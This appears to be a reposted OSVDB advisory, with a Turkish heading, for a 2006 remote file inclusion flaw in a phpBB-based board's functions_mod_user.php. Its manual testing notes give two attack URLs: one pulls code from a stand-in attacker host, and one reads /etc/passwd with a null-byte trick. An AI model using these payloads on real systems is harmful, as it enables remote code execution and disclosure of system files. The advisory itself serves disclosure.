*edited* eski bir açık
*edited* functions_mod_user.php phpbb_root_path Variable Remote File Inclusion
OSVDB ID: 28140
Disclosure Date: Aug 24, 2006
Description:
*edited* contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'functions_mod_user.php' not properly sanitizing user input supplied to the 'phpbb_root_path' variable. This may allow an attacker to include a file from a remote host or the local system of the target that contains arbitrary commands which will be executed by the vulnerable script.
Technical Description:
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
This vulnerability can be exploited to include internal files local to the target system when the magic_quotes_gpc PHP option is 'off'.
Vulnerability Classification:
Remote/Network Access Required
Input Manipulation
Loss Of Integrity
Exploit Available
Web Related
Products:
*edited* *edited* 2.0.33
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Manual Testing Notes:
http://[target]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://[attacker]/cmd.txt?
http://[target]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=/etc/passwd%00
External References:
Related OSVDB ID: 28141
Secunia Advisory ID: 21602
Vendor URL: http://www.*edited*.net/
Other Advisory URL: http://www.nukedx.com/?viewdoc=48
Mail List Post: http://archives.neohapsis.com/archives/ ... /0624.html
Credit:
Mustafa Can Bjorn - Personal Page
Vulnerability Status:
This entry was last updated on Aug 25, 2006. If you have additional information or corrections for this vulnerability please submit them to OSVDB Moderators.
Direct URL to this page: http://www.osvdb.org/28140
